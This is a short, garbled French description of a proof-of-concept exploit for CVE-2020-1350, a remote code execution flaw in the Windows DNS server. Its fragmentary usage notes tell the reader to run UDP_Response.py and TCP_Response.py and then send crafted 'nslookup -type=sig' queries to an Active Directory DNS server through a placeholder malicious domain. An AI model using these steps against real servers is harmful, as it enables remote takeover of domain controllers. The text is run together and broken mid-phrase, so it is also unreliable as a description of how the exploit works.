
Preuve de concept d'exploitation pour CVE-2020-1350, une vulnérabilité critique d'exécution de code à distance dans le serveur DNS Windows. Démontre l'exploitation via des requêtes DNS spécialement conçues.
CVE-2020-1350 Preuve de concept
33y0re.com)blah fait 0x4 octets et .net fait 0x3 octets)domain_correct sur \x04blah\03net\x00python UDP_Response.py et python TCP_Response.pynslookup -type=sig 33y0re.com ACTIVE_DIRECTORY_DNS_SERVER_IP suivi de : nslookup -type=sig 9.MALICIOUS_DOMAIN_FROM_LINUX_BOX_SCRIPT ACTIVE_DIRECTORY_DNS_SERVER_IP